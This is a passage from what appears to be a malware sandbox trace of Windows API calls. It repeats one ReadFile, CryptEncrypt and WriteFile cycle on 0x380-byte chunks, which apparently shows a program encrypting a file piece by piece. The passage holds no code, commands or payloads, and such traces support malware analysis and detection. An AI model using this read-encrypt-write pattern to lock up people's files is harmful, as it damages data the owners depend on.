lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.152] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.152] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.152] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.153] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.153] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.153] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.153] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.153] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.153] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.153] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.153] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.153] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.153] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.153] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.153] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.153] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.153] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.153] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.154] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.154] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.154] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.154] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.154] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.154] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.154] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.154] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.154] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.154] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.154] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.154] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.154] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.155] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.155] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.155] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.155] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.155] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.155] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.155] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.155] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.155] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.155] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.155] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.155] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.155] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.155] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.156] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.156] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.156] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.156] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.156] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.156] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.156] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.156] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.156] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.156] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.156] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.156] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.156] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.203] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.203] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.204] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.204] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.204] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.204] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.204] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.204] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.204] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.204] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.204] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.204] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.204] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.204] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.204] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.204] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.204] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.205] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.205] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.205] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.205] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.205] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.205] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.205] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.205] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.205] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.205] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.205] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.205] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.205] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.205] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.205] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.206] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.206] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.206] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.206] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.206] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.206] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.206] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, 